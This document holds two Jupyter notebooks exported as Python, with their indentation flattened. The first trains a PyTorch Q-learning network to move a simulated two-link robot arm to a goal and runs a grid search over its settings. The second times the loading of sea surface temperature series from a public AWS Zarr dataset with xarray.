robot.update_joints(np.random.uniform(-2 * pi, 2 * pi, size=(robot.n_links)))
angles = robot.get_angles()
state = np.hstack([angles_to_sin_cos(robot.get_angles()), robot.get_goal()])
return state
def initial_state_w_angles(robot):
angles = robot.get_angles()
state = initial_state(robot)
angles = robot.get_angles()
state_w_state_angles = np.hstack([state, angles, robot.get_link_lengths(), robot.get_theta_r_goal()])
return state_w_state_angles
def next_state(robot, action):
robot.add_to_joints(action)
angles = robot.get_angles()
state = np.hstack([angles_to_sin_cos(robot.get_angles()), robot.get_goal()])
return state
def next_state_w_angles(robot, action):
state = next_state(robot, action)
angles = robot.get_angles()
state_w_angles = np.hstack([state, angles, robot.get_link_lengths(), robot.get_theta_r_goal()])
return state_w_angles
def reinforcement(robot):
'''Objective is to move gripper to the goal location as quickly as possible.'''
dist_to_goal = robot.dist_to_goal()
return dist_to_goal
# -
# set up state functions dictionary to pass into training functions
def get_state_functions(polar_coord):
if polar_coord:
initial_state_f = initial_state_w_angles
next_state_f = next_state_w_angles
state_f = get_state_w_angles
else:
initial_state_f = initial_state
next_state_f = next_state
state_f = get_state
return {'initial_state_f':initial_state_f,
'next_state_f':next_state_f,
'state_f':state_f}
# The two main functions used in the simulations are `epsilon_greedy` and `make_samples`. `make_samples` creates a specified number steps for each training trial. For each step in the trial, `make_samples` calls `epsilon_greedy` which uses the `Qnet` to predict the `R` for each action given the current state. If a greedy action is selected, then the action with the lowest predicted `R` is returned; otherwise, a random action is returned. These random actions help to explore the state-action space. Early in training, most actions are random, allowing the `Qnet` to gain experience in the space. But as training progresses, most actions are greedy.
#
# `epsilon_greedy` is also used in the `animate` function in the `robot` class to get the actions for the animations.
def epsilon_greedy(robot, Qnet,
valid_actions,
state_f,
epsilon, # probablity of a random move
device
):
# not using variable goal in training
# state = angles_to_sin_cos(robot.get_angles())
# send Qnet to appropriate device
Qnet.to(device)
state = state_f(robot)
if np.random.uniform() < epsilon:
# Random Move
actioni = np.random.randint(valid_actions.shape[0])
action = valid_actions[actioni]
else:
# Greedy Move
state_x = np.tile(state,valid_actions.shape[0]).reshape(valid_actions.shape[0],-1)
xs = torch.from_numpy(np.hstack([state_x, valid_actions])).float().to(device)
Qs = Qnet(xs).reshape(-1,1)
ai = torch.argmin(Qs)
action = valid_actions[ai]
x = torch.from_numpy(np.hstack((state, action)).reshape((1, -1))).float().to(device)
Q = Qnet(x)
return action, Q
def make_samples(robot, Qnet, n_inputs, reinforcement_f,
valid_actions, n_samples, epsilon,
state_funcs,
random_goal=False,
device=device):
debug = False
# get state functions from state_func dictionary
initial_state_f = state_funcs['initial_state_f']
next_state_f = state_funcs['next_state_f']
state_f = state_funcs['state_f']
if debug: print('allocating vectors')
X = torch.from_numpy(np.zeros((n_samples, n_inputs))).to(device)
R = torch.from_numpy(np.zeros((n_samples, 1))).to(device)
Qn = torch.from_numpy(np.zeros((n_samples, 1))).to(device)
if debug: print('setting up state')
# update random goal
if random_goal:
robot.set_rand_goal()
state = initial_state_f(robot)
state = next_state_f(robot, [0] * robot.n_links) # 0 action for all joints
action, _ = epsilon_greedy(robot, Qnet, valid_actions, state_f, epsilon, device)
# Collect data from numSamples steps
for step in range(n_samples):
if debug:
print('_____________')
print(f'step: {step}')
print('setting up state')
next_state = next_state_f(robot, action)
r = reinforcement_f(robot)
if debug: print('epsilon greedy')
next_action, next_Q = epsilon_greedy(robot, Qnet, valid_actions, state_f, epsilon, device)
if debug: print('save results')
X[step, :] = torch.from_numpy(np.hstack((state, action)))
R[step, 0] = r
Qn[step, 0] = torch.detach(next_Q)
# Advance one time step
state, action = next_state, next_action
return (X, R, Qn)
# ## `MLP` Class
#
# This defines a class to construct an MLP using Pytorch. The inputs to the constructor are a follows:
# * input_size: the number of variables in the state-action space (i.e. number of columns in X)
# * h_sizes: a list with number of hidden units in each layer, `[20,10]` constructs a two layer model with `20` and `10` hidden units respectively
# * n_out: the dimension of the output (i.e. the number of columns in Y)
# * act_func: the activation function to use, currently supports "tanh, "elu", "relu", "sigmoid"
# * use_layer_norm: Boolean flag for adding layer normalization
#
# The number and size of the layers is dynamically defined using `h_sizes`. In the constructor, this is converted to an `nn.ModuleList`, so the layers will be tracked and the layer weights saved when check pointing the model. The `forward` function calculates a forward pass based the model definition that is used by Pytorch to set up the automatic differentiation in the backwards pass updates. `model_to_dict` is a convenience function to save the model definition to a dictionary, so the model can be recreated from file and the check pointed weights loaded into the model.
# +
# see this excellent article on normalization techniques
# https://mlexplained.com/2018/11/30/an-overview-of-normalization-methods-in-deep-learning/
class MLP(nn.Module):
def __init__(self, input_size, h_sizes, n_out, act_func = 'tanh', use_layer_norm=True):
'''act_func: one of "tanh, "elu", "relu", "sigmoid"
defaults to "tanh"
'''
super(MLP, self).__init__()
self.input_size = input_size
self.h_sizes = h_sizes
self.n_out = n_out
self.act_func = act_func
self.use_layer_norm = use_layer_norm
# Hidden layers
# use nn.ModuleList() so layers will avaible in state_dict
self.hidden = nn.ModuleList()
# layer normalization layers
if self.use_layer_norm:
self.ln = nn.ModuleList()
else:
self.ln = None
# create a list of layer sizes to use in model construction
sizes = [input_size] + h_sizes # + [n_out]
# build model
for k in range(len(sizes)-1):
self.hidden.append(nn.Linear(sizes[k], sizes[k+1]))
if self.use_layer_norm:
self.ln.append(nn.LayerNorm(sizes[k+1]))
# Output layer
self.out = nn.Linear(sizes[-1], self.n_out)
# save model architecture to dictionary
def model_to_dict(self):
model_dict = {'input_size':self.input_size,
'h_sizes':self.h_sizes,
'n_out':self.n_out,
'act_func':self.act_func,
'use_layer_norm':self.use_layer_norm}
return(model_dict)
# forward pass calculation
def forward(self, x):
# set activation function
if self.act_func == 'elu':
act = nn.ELU()
elif self.act_func == 'relu':
act = nn.ReLU()
elif self.act_func == 'sigmoid':
act = nn.Sigmoid()
else: # default to tanh
act = nn.Tanh()
# x needs to be torch tensor
if type(x) == 'numpy.ndarray':
x = torch.from_numpy(x).float()
# Feedforward
for i in range(len(self.hidden)):
layer = self.hidden[i]
if self.use_layer_norm:
ln = self.ln[i]
x = act(ln(layer(x)))
else:
x = act(layer(x))
output= self.out(x)
return output
# -
test = MLP(10, [20,20], 1, 'elu')
test.model_to_dict()
test.hidden
test.ln
# # Reinforcement Learning Training Algorithm
#
# The `train` function wraps up all of the previous work into a function that can be used for setting up training. Its inputs are:
# * robot: member of the robot class to model
# * state_funcs: a dictionary containing the state functions with the keys - 'initial_state_f', 'next_state_f', 'state_f'
# * valid_actions: an array of all the permutations of possible actions
# * n_hiddens_list: list containing the sizes of the hidden layers
# * n_trials: number of training trails to run (i.e, the number of calls to `make_samples`)
# * n_steps_per_trial: the number of steps created in each call to `make_samples`
# * n_opt_iterations: the number of steps taken by the optimizer after each call to `make_samples`
# * final_epsilon: the final probability for taking a random move
# * gamma: the discount rate for future reinforcements
# * learning_rate: step size for the optimizer
# * act_func: activation function to use in the MLP
# * random_goal: boolean flag for generating a random goal for run of `make_samples`
# * device: GPU or CPU string, like 'cpu' or 'cuda:0'
#
# This function returns the trained Qnet and traces from the training.
# +
# define weights initialization function
# first checks the module type
# then applies the desired changes to the weights
def init_normal(m):
if type(m) == nn.Linear:
nn.init.uniform_(m.weight)
def train(robot, polar_coord, valid_actions,
n_hiddens_list,
n_trials,
n_steps_per_trial,
n_opt_iterations,
final_epsilon,
gamma,
learning_rate,
act_func='tanh',
random_goal=False,
device=device
):
# get state_funcs based on boolean value of polar_coord
state_funcs = get_state_functions(polar_coord)
# get state functions from state_func dictionary
initial_state_f = state_funcs['initial_state_f']
next_state_f = state_funcs['next_state_f']
state_f = state_funcs['state_f']
# flag for printing losses
print_losses = False
# to produce this final epsilon value
final_trial_decay = (n_trials-20) if (n_trials-20) > 20 else n_trials
epsilon_decay = np.exp(np.log(final_epsilon+0.00001) / (final_trial_decay))
# put valid_actions on device
valid_actions = torch.from_numpy(valid_actions)
valid_actions.to(device)
# instantiate Qnet
n_inputs = len(initial_state_f(robot)) + valid_actions.shape[1]
Qnet = MLP(n_inputs, n_hiddens_list, n_out=1, act_func=act_func)
Qnet.to(device)
# apply the initialization strategy to the model weights
Qnet.apply(init_normal)
# define loss function
loss_fn = torch.nn.MSELoss(reduction='mean')
# Use the optim module to define an Optimizer that will update the model weights
optimizer = torch.optim.Adam(Qnet.parameters(), lr=learning_rate)
# initial epsilon value for taking random or greedy actions
epsilon = 1
epsilon_trace = []
r_mean_trace = []
r_trace = []
loss_trace = []
print('Starting trials')
print('______________________________________________\n')
# start learning trials
for trial in range(n_trials):
# Collect n_steps_per_trial samples
X, R, Qn = make_samples(robot, Qnet, n_inputs,
reinforcement, valid_actions,
n_steps_per_trial, epsilon,
state_funcs,
random_goal,
device)
# create targets for Qnet
y = (R + gamma * Qn).float()
# train Qnet
for t in range(n_opt_iterations):
# Forward pass
y_pred = Qnet(X.float())
# Compute and print loss
loss = loss_fn(y_pred, y)
if print_losses and t % 100 == 99:
print(t, loss.item())
# Zero gradients, perform a backward pass, and update the weights
optimizer.zero_grad()
loss.backward()
optimizer.step()
# Update traces
epsilon_trace = epsilon_trace + [epsilon]
r_mean_trace = r_mean_trace + [np.mean(R.cpu().numpy())]
r_trace = r_trace + list(itertools.chain.from_iterable(R))
loss_trace = loss_trace + [loss_fn(y_pred, y).detach().cpu().numpy()]
# Decay epsilon for taking greedy or random actions
epsilon *= epsilon_decay
# print training progress
n_prints = np.min([250, (n_trials // 10)])
# if trial + 1 == n_trials or (trial + 1) % (n_trials // 10) == 0:
if trial + 1 == n_trials or (trial + 1) % (n_prints) == 0:
r = np.mean(r_mean_trace[-10:])
l = np.mean(loss_trace[-10:])
print(f'Trial - {trial+1}: Mean R {r:.3f} - MSE loss {l:.3f}')
return Qnet, state_funcs, r_mean_trace, r_trace, loss_trace, epsilon_trace
# -
# ## Test Training
# * Instantiate robot
# * Set up action space
# * Get state
# * Set training parameters
# * Run train function
# * Build plots and animations
# set up a matrix of valid actions to choose from
single_joint_actions = [-0.1, 0, 0.1]
valid_actions = np.array(list(itertools.product(single_joint_actions, repeat=robot.n_links)))
valid_actions
# ### Train with a Fixed Goal and without Polar Coordinates
#
# For this first test, I'll train the model without the use of polar coordinates in the state space. I'll run the experiment with a larger number of trials compared to the number of samples in each trial. This will give the model more experience learning the state-action space since the Qnet is updated after each trial. This model will be trained with a fixed goal. Since this is for testing, using a fixed goal will reduced the training time needed to ensure that the components are working correctly. After these tests are completed, then I'll test on a variable goal model.
# +
# instantiate robot and set goal
robot = Robot([3., 3.])
robot.set_goal([5., 6.])
# set up parameters for training
n_hiddens_list = [64, 64]
n_trials = 1000
n_steps_per_trial = 128
n_opt_iterations = 10
final_epsilon = 0.01
gamma = 0.8
learning_rate = 0.001
act_func = 'relu'
random_goal = False
polar_coord = False
device = 'cpu'
# +
# train RL model
np.random.seed(42)
torch.manual_seed(42)
t0 = time.time()
Qnet, _, r_mean_trace, _, loss_trace, epsilon_trace = train(robot, polar_coord, valid_actions,
n_hiddens_list,
n_trials,
n_steps_per_trial,
n_opt_iterations,
final_epsilon,
gamma,
learning_rate,
act_func,
random_goal,
device
)
t1 = time.time()
print(f'elapsed minutes: {(t1-t0)/60}')
# +
device = 'cuda:0'
# train RL model
np.random.seed(42)
torch.manual_seed(42)
t0 = time.time()
Qnet, state_funcs, r_mean_trace, _, loss_trace, epsilon_trace = train(robot, polar_coord, valid_actions,
n_hiddens_list,
n_trials,
n_steps_per_trial,
n_opt_iterations,
final_epsilon,
gamma,
learning_rate,
act_func,
random_goal,
device
)
t1 = time.time()
print(f'elapsed minutes: {(t1-t0)/60}')
# -
# save experiment in dictionary
experiment_test = {'params':None,
'r_mean_trace_list':[r_mean_trace],
'loss_trace_list':[loss_trace],
'epsilon_trace_list':[epsilon_trace],
'robot':robot,
'best_Qnet_model':Qnet.model_to_dict(),
'checkpoint':{'state_dict': Qnet.state_dict()}}
# #### Test saving and loading Qnet from file
# save model definition and wieghts
torch.save({'state_dict': Qnet.state_dict()}, 'experiment/Qnet_state_test.pth')
joblib.dump(Qnet.model_to_dict(), 'experiment/Qnet_model_test.joblib')
# load dictionary with the model definition for the best Qnet
Qnet_model = joblib.load('experiment/Qnet_model_test.joblib')
Qnet_model
# +
# build model from definition
Qnet = MLP(Qnet_model['input_size'],
Qnet_model['h_sizes'],
Qnet_model['n_out'],
Qnet_model['act_func'],
Qnet_model['use_layer_norm'])
Qnet.model_to_dict()
# +
# load model state from best Qnet
checkpoint = torch.load('experiment/Qnet_state_test.pth')
# load model weights from best Qnet
Qnet.load_state_dict(checkpoint['state_dict'])
# -
# define function to plot experiment
def plot_experiment(experiment, index=0):
'''experiment is a dictionary containing:
params - DataFrame containing parameters and Qnet
r_mean_trace_list - list containing r_mean_traces from trials
r_trace_list - list containing r_traces from trials
epsilon_trace_list - list containing epsilon_traces from trials'''
plt.figure(figsize=(10, 10))
plt.clf()
plt.subplot(3, 1, 1)
plt.plot(experiment['r_mean_trace_list'][index])
plt.xlabel('Trial')
plt.ylabel('Mean R per Trial')
plt.subplot(3, 1, 2)
plt.plot(experiment['loss_trace_list'][index])
plt.xlabel('Trial')
plt.ylabel('MSE')
plt.subplot(3, 1, 3)
plt.plot(experiment['epsilon_trace_list'][index])
plt.xlabel('Trial')
plt.ylabel('Epsilon')
# plot training traces
plot_experiment(experiment_test)
# run robot animations
state_funcs = get_state_functions(polar_coord)
for i in range(5):
if random_goal:
robot.set_rand_goal()
initial_state(robot)
robot.animate(50, Qnet, state_funcs['state_f'])
# show trace of animation steps
np.random.seed(4444)
initial_state(robot)
robot.animate(50, Qnet, state_funcs['state_f'], show_all_steps=True)
# ### Train with a Fixed Goal and with Polar Coordinates
#
# This test will use the same training parameters as the previous test, with the addition of polar coordinates to the state space. I'm curious to see if this extra information will help the Qnet learn the state-action space better and/or faster than only using Cartesian coordinates. In particular, I wonder if the model using only the Cartesian coordinates will have to learn how to approximate some the trigonometric transformations that are included in the polar coordinates. If that's the case, then my thought is that the model my learn faster if it doesn't have to learn these approximations since they are provided in the state space.
# +
# add polar coordinates to state
polar_coord = True
# instantiate robot and set goal
robot = Robot([3., 3.])
robot.set_goal([5., 6.])
# train RL model
np.random.seed(42)
torch.manual_seed(42)
t0 = time.time()
Qnet, state_funcs, r_mean_trace, _, loss_trace, epsilon_trace = train(robot, polar_coord, valid_actions,
n_hiddens_list,
n_trials,
n_steps_per_trial,
n_opt_iterations,
final_epsilon,
gamma,
learning_rate,
act_func,
random_goal,
device
)
t1 = time.time()
# -
print(f'elapsed minutes: {(t1-t0)/60}')
# save experiment in dictionary
experiment_test = {'params':None,
'r_mean_trace_list':[r_mean_trace],
'loss_trace_list':[loss_trace],
'epsilon_trace_list':[epsilon_trace],
'robot':robot,
'best_Qnet_model':Qnet.model_to_dict(),
'checkpoint':{'state_dict': Qnet.state_dict()}}
# plot training traces
plot_experiment(experiment_test)
# run robot animations
for i in range(5):
if random_goal:
robot.set_rand_goal()
initial_state(robot)
robot.animate(50, Qnet, state_funcs['state_f'])
# show trace of animation steps
np.random.seed(4444)
initial_state(robot)
robot.animate(50, Qnet, state_funcs['state_f'], show_all_steps=True)
# ### Polar Coordinate Test Results
#
# With this initial testing, the polar coordinates did not provide a substantial improvement in learning. I'll test training with polar coordinates with a larger model to see if increasing model complexity will allow it to make better use of the additional information.
#
# ### Train with Variable Goal
#
# To train the model with a variable goal, I will increase the number of trials and steps per trials and train a larger network. Since the Qnet updates after every trial, this will allow the model to explore and learn the more complex state-action space that now includes a moving goal and polar coordinates.
# +
# instantiate robot and set goal
robot = Robot([3., 3.])
robot.set_goal([5., 6.])
# set up parameters for training
n_hiddens_list = [256, 256]
n_trials = 10000
n_steps_per_trial = 256
n_opt_iterations = 35
final_epsilon = 0.001
gamma = 0.8
learning_rate = 0.001
act_func = 'elu'
random_goal = True
polar_coord = True
device = 'cuda:0'
# +
# train RL model
np.random.seed(42)
torch.manual_seed(42)
t0 = time.time()
Qnet, state_funcs, r_mean_trace, _, loss_trace, epsilon_trace = train(robot, polar_coord, valid_actions,
n_hiddens_list,
n_trials,
n_steps_per_trial,
n_opt_iterations,
final_epsilon,
gamma,
learning_rate,
act_func,
random_goal,
device
)
t1 = time.time()
# -
print(f'elapsed minutes: {(t1-t0)/60}')
np.mean(r_mean_trace[-20:])
# save experiment in dictionary
experiment_test = {'params':None,
'r_mean_trace_list':[r_mean_trace],
'loss_trace_list':[loss_trace],
'epsilon_trace_list':[epsilon_trace],
'robot':robot,
'best_Qnet_model':Qnet.model_to_dict(),
'checkpoint':{'state_dict': Qnet.state_dict()}}
# plot training traces
plot_experiment(experiment_test)
# run robot animations
for i in range(5):
if random_goal:
robot.set_rand_goal()
initial_state(robot)
robot.animate(50, Qnet, state_funcs['state_f'])
# show trace of animation steps
np.random.seed(4444)
# get state_funcs based on boolean value of polar_coord
state_funcs = get_state_functions(polar_coord)
initial_state(robot)
robot.animate(100, Qnet, state_funcs['state_f'], show_all_steps=True)
# # RL Experiments
# * Instantiate robot
# * Set up parameter grid for model selection
# * Train over parameter grid
# * Save best model definition and state during training
# * Load best model
# * Generate plots
# * Generate animations
#
# See https://docs.nvidia.com/deeplearning/performance/dl-performance-fully-connected/index.html#checklist for tips to improve GPU performance. From the documentation:
#
# ...choosing the batch size and the number of inputs and outputs to be divisible by at least 64 and ideally 256 can streamline tiling and reduce overhead...
#
# Steps per trials is works like a batch size, so I'll set the steps per trial to be divisible by 64 as well as the number of nodes in the hidden layers.
# instantiate robot
robot = Robot([3., 3.])
robot.set_goal([5., 6.])
# +
# create a parameter grid to search over
random_goal = True
polar_coord = [True, False]
device = 'cuda:0'
# set up lists of parameters to search over
n_hiddens_list = [
[256, 256],
[512, 512],
[768, 768],
# [1024, 1024]
]
n_trials = [10000]
n_steps_per_trial = [256]
n_opt_iterations = [15, 35, 75]
final_epsilon = [0.01]
gamma = [0.8]
learning_rate = [0.001]
act_func = ['elu'] # 'relu', 'sigmoid' , 'elu', 'tanh'
grid = {
'polar_coord' : polar_coord,
'n_hiddens_list' : n_hiddens_list,
'n_trials' : n_trials,
'n_steps_per_trial' : n_steps_per_trial,
'n_opt_iterations' : n_opt_iterations,
'final_epsilon' : final_epsilon,
'gamma' : gamma,
'learning_rate' : learning_rate,
'act_func' : act_func,
}
# create parameter grid
params = ParameterGrid(grid)
params = pd.DataFrame(params)
params['mean_last_20_r'] = None
params['state_funcs'] = None
# allocate lists to hold traces from training
r_mean_trace_list = [None] * params.shape[0]
loss_trace_list = [None] * params.shape[0]
epsilon_trace_list = [None] * params.shape[0]
params
# +
# it seems wastefull to not to checkpoint the models instead of running all
# all the separate number of trials, i.e. for [500, 1000] trials just checkpoint
# the 500 trial and run only 1000 trials but this ignores the differences in
# epsilon decay between 500 and 1000 trials, a model checkpointed at 500 trials
# will taking more random actions than a model designed for 500 trials
best_last_20 = np.inf
t0 = time.time()
for i in range(params.shape[0]):
np.random.seed(42)
torch.manual_seed(42)
print('______________________________________________________________________\n')
print(f'Working on row: {i}')
display(params.iloc[i,:])
Qnet, state_funcs, r_mean_trace, _, loss_trace, epsilon_trace = train(robot,
params.polar_coord[i],
valid_actions,
params.n_hiddens_list[i],
params.n_trials[i],
params.n_steps_per_trial[i],
params.n_opt_iterations[i],
params.final_epsilon[i],
params.gamma[i],
params.learning_rate[i],
params.act_func[i],
random_goal,
device
)
# save traces
r_mean_trace_list[i] = r_mean_trace
loss_trace_list[i] = loss_trace
epsilon_trace_list[i] = epsilon_trace
# get mean of the last 20 average Rs
params.loc[i,'mean_last_20_r'] = np.mean(r_mean_trace[-20:])
# update best score and save Qnet to file
if best_last_20 > params.loc[i,'mean_last_20_r']:
# save Qnet model structure and state
torch.save({'state_dict': Qnet.state_dict()}, 'experiment/best_Qnet_state.pth')
joblib.dump(Qnet.model_to_dict(), 'experiment/best_Qnet_model.joblib')
# update best score
best_last_20 = params.loc[i,'mean_last_20_r']
print(f'\nMean of average R for last 20 trials: {params.mean_last_20_r[i]}')
print(f'Best of average R for last 20 trials: {best_last_20}\n')
t1 = time.time()
# -
print(f'elapsed hours: {(t1-t0)/3600}')
# load dictionary with the model definition for the best Qnet
best_Qnet_model = joblib.load('experiment/best_Qnet_model.joblib')
best_Qnet_model
# +
# build model from definition
best_Qnet = MLP(best_Qnet_model['input_size'],
best_Qnet_model['h_sizes'],
best_Qnet_model['n_out'],
best_Qnet_model['act_func'],
best_Qnet_model['use_layer_norm'])
best_Qnet.model_to_dict()
# +
# load model state from best Qnet
checkpoint = torch.load('experiment/best_Qnet_state.pth')
# load model weights from best Qnet
best_Qnet.load_state_dict(checkpoint['state_dict'])
# +
# save experiment in dictionary
experiment_1 = {'params':params.copy(),
'r_mean_trace_list':r_mean_trace_list.copy(),
'loss_trace_list':loss_trace_list.copy(),
'epsilon_trace_list':epsilon_trace_list.copy(),
'robot':robot,
'best_Qnet_model':best_Qnet.model_to_dict(),
'checkpoint':{'state_dict': best_Qnet.state_dict()}}
# save experiment dictionary to file
joblib.dump(experiment_1, 'experiment/experiment_1.joblib')
# -
# load best_Qnet from file if needed
if False:
experiment_1 = joblib.load('experiment/experiment_1.joblib')
# get model definition
best_Qnet_model = experiment_1['best_Qnet_model']
# build model from definition
best_Qnet = MLP(best_Qnet_model['input_size'],
best_Qnet_model['h_sizes'],
best_Qnet_model['n_out'],
best_Qnet_model['act_func'])
# load model weights from checkpoint
best_Qnet.load_state_dict(experiment_1['checkpoint']['state_dict'])
# +
# Take a look at the parameters from the best model
# sort by mean_last_20_r
best_index = experiment_1['params'].sort_values('mean_last_20_r').head(1).index
print(f'index of best model: {best_index[0]}')
experiment_1['params'].sort_values('mean_last_20_r').head()
# -
# look at the best parameters from the data frame
experiment_1['params'].loc[best_index[0],:]
plot_experiment(experiment_1, best_index[0])
# There is quite a bit of volatility towards the end of training in `Mean R per Trial` and `MSE` for the Qnet. Perhaps some additional training might help. Let's set up a heat map to understand where a new grid search could be directed to improve model performance.
#
# ## Set Up the Data Frame to Visualize the Results in a Heat Map
#
# * `mean_last_20_r` needs to be converted to a numeric value
# * `n_hiddens_list` needs to be converted to a string for grouping
# * Data will be pivoted with `n_opt_iterations` on the columns, `mean_last_20_r` as the values, and the remaining parameter search variables as groups on the rows
# +
# convert mean_last_20_r to numeric for use in pivot table
experiment_1['params'].loc[:,'mean_last_20_r'] = pd.to_numeric(experiment_1['params'].loc[:,'mean_last_20_r'])
# convert n_hiddens_list to string for use in pivot table
nh_string = [str(nh) for nh in experiment_1['params'].loc[:,'n_hiddens_list']]
experiment_1['params']['nh_string'] = nh_string
# -
experiment_1['params'].info()
index_cols = ['polar_coord', 'act_func', 'nh_string', 'n_trials', 'n_steps_per_trial']
pivot_results = experiment_1['params'].pivot_table(values='mean_last_20_r',
index=index_cols,
columns='n_opt_iterations')
pivot_results
sns.heatmap(pivot_results);
# **Thoughts on Heat Map:**
# * The models that included polar coordinates in the state space performed better.
# * The additional complexity of the [768, 768] model did provide any benefit to learning.
# * Additional optimization steps may have improved the results of the [256,256] model which provided results that were pretty close to the [512,512] model.
# * Repeating the experiment with more steps per trail and optimization steps might yield further model improvements.
# ## Examine the Animation to See How Well the Model Learned
# +
robot = experiment_1['robot']
# get state_funcs based on boolean value of polar_coord
state_funcs = get_state_functions(experiment_1['params'].loc[best_index[0],'polar_coord'])
for i in range(5):
if random_goal:
robot.set_rand_goal()
initial_state(robot)
robot.animate(50, best_Qnet, state_funcs['state_f'])
# +
np.random.seed(4444)
initial_state(robot)
robot.animate(100, best_Qnet, state_funcs['state_f'], show_all_steps=True)
# -
# ## Summary of Experiment
#
# * Adding polar coordinates is helpful but the model complexity and training steps need to be increased so the model can learn how to use the additional information.
#
# * Slower training, i.e. more steps per trial, helped the models with variable goals learn the best actions for the variable goal state spaces.
#
# * Additional testing with activation functions could be worthwhile. I did some testing with ELU, ReLU, and Tanh and in these tests ELU performed better but these test were not exhaustive. Given additional time tuning in the activation functions in the parameter grid would be interesting.
#
# * The ADAM optimizer was used throughout the experiment. A couple runs were tested using SGD and a couple of learning rate decay strategies but ADAM performed better in this limited testing. This is another area where further testing may prove beneficial.
# ## Next Steps
#
# ### Implement Parallel Training
#
# Torch has a drop in replacement for Python's `multiprocessing` package. Further work can be directed toward implementing the training function, so it can be run in parallel in order to speed up parameter searching.
#
# https://pytorch.org/docs/master/notes/multiprocessing.html
#
# ### Try Building a RL Model for Robots with More Links and More Actions
#
# The action space could be increased from `[-0.1, 0.0, 0.1]` to something like `[-0.1, -0.05, 0.0, 0.05, 0.1]` in order to give the robot greater precision. The number of links could be increased as well in order to give the robot greater flexibility. Each of the these changes will increase the training complexity and training time. Implementing parallel training would help reduce the training time.
|
Reinforcement learning for robot arm - pytorch.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: nsidc-cloud
# language: python
# name: nsidc-cloud
# ---
# # End-user generated time series analysis using Zarr data in xarray
#
# This notebook describes the python-based Zarr time series approach as part of the TRT-43 time series technology study. This notebook was adapted from the [Pangeo AGU Ocean Sciences 2020 tutorial](https://github.com/pangeo-gallery/osm2020tutorial) with credits below:
#
# ### Credits: Tutorial development
# Dr. <NAME> - Twitter - Farallon Institute
#
# <NAME> - Twitter - University of California, Davis
#
# ### Compute Resources
# This notebook was developed and run using an AWS m5.2xlarge instance as this is what was utilized in the Pangeo workshop via their OHW JupyterHub. This has 8 vCPU and 32 GB memory.
# # Dataset used: Multi-Scale Ultra High Resolution (MUR) Sea Surface Temperature (SST)
#
# Found from the AWS Open Registry:
#
# - Click here: [AWS Public Dataset](https://aws.amazon.com/opendata/)
# - Click on `Find public available data on AWS` button
# - Search for MUR
# - Select [MUR SST](https://registry.opendata.aws/mur/)
#
#
#
#
#
#
# -------------------------------------------------------
#
# 
#
#
# ## [MUR SST](https://podaac.jpl.nasa.gov/Multi-scale_Ultra-high_Resolution_MUR-SST) [AWS Public dataset program](https://registry.opendata.aws/mur/)
#
# ### Access the MUR SST Zarr store which is in an s3 bucket.
#
# 
#
# We will start with my favorite Analysis Ready Data (ARD) format: [Zarr](https://zarr.readthedocs.io/en/stable/). Using data stored in Zarr is fast, simple, and contains all the metadata normally in a netcdf file, so you can figure out easily what is in the datastore.
#
# - Fast - Zarr is fast because all the metadata is consolidated into a .json file. Reading in massive datasets is lightning fast because it only reads the metadata and does read in data until it needs it for compute.
#
# - Simple - Filenames? Who needs them? Who cares? Not I. Simply point your read routine to the data directory.
#
# - Metadata - all you want!
# ## Import Libraries
#
# You may need to pip install these libraries depending on your python environment
# +
# pip install xarray
# pip install s3fs
# pip install dask
# +
# filter some warning messages
import warnings
warnings.filterwarnings("ignore")
#libraries
import datetime as dt
import xarray as xr
import fsspec
import s3fs
from matplotlib import pyplot as plt
import numpy as np
import pandas as pd
import time
from statistics import mean
from statistics import stdev
# make datasets display nicely
xr.set_options(display_style="html")
import dask
from dask.distributed import performance_report, Client, progress
#magic fncts #put static images of your plot embedded in the notebook
# %matplotlib inline
plt.rcParams['figure.figsize'] = 12, 6
# %config InlineBackend.figure_format = 'retina'
# -
#
# [fsspec.get_mapper](https://filesystem-spec.readthedocs.io/en/latest/api.html?highlight=get_mapper#fsspec.get_mapper) Creates a mapping between your computer and the s3 bucket. This isn't necessary if the Zarr file is stored locally.
#
# [xr.open_zarr](http://xarray.pydata.org/en/stable/generated/xarray.open_zarr.html) Reads a Zarr store into an Xarray dataset
#
# ## Open zarr dataset
#
# Commented out, as this is added as the first step of each test
# +
# # %%time
# file_location = 's3://mur-sst/zarr'
# ikey = fsspec.get_mapper(file_location, anon=True)
# ds_sst = xr.open_zarr(ikey,consolidated=True)
# ds_sst
# -
# ## Testing scenarios
#
# Based on https://wiki.earthdata.nasa.gov/display/TRT/Test+Scenarios
#
# Spatial Constraints:
#
#
#
# Single grid cell (-129.995, 39.995, -129.995, 39.995) /analysed_sst[][5000][5000];/time;/lat[5000];/lon[5000] (-129.95, 39.95, -129.95, 39.95)
# 10x10 grid cells (-129.995, 39.995, -129.905, 39.905) /analysed_sst[][5000:5009][5000:5009];/time;/lat[5000:5009];/lon[5000:5009] (-129.95, 39.95, -129.86, 39.86)
# 3x3 grid cells (-129.995, 39.995, -129.975, 39.975) /analysed_sst[][5000:5002][5000:5002];/time;/lat[5000:5002];/lon[5000:5002] (-129.95, 39.95, -129.93, 39.93)
#
# Temporal Constraints
#
#
# 100 2003-01-01/2003-04-10 2000-06-01/2000-06-03
# 1000
# 2003-01-01/2005-09-27
#
# 2000-06-01/2000-06-21
# 7014 2002-05-31/2021-08-12
# 100000
# 2000-06-01/2006-02-13
# 366625
# 2000-06-01/2021-04-30
# 1,000,000
#
# ### Test 1:
# Single Grid Cell; 100 time slices
# +
times = []
for i in range(10):
t0 = time.time()
file_location = 's3://mur-sst/zarr'
ikey = fsspec.get_mapper(file_location, anon=True)
ds_sst = xr.open_zarr(ikey,consolidated=True)
sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2003-01-01','2003-04-10'),
lat = 40,
lon = -130
).load()
wall_time = time.time() - t0
times.append(wall_time)
print (wall_time, "seconds wall time")
ds_sst
print("mean wall time:", mean(times), "stdev wall time:", stdev(times))
# -
sst_timeseries
sst_timeseries.plot()
# ### Test 2:
# Single Grid Cell; 1000 time slices
# +
times = []
for i in range(10):
t0 = time.time()
file_location = 's3://mur-sst/zarr'
ikey = fsspec.get_mapper(file_location, anon=True)
ds_sst = xr.open_zarr(ikey,consolidated=True)
sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2003-01-01','2005-09-26'),
lat = 40,
lon = -130
).load()
wall_time = time.time() - t0
times.append(wall_time)
print (wall_time, "seconds wall time")
ds_sst
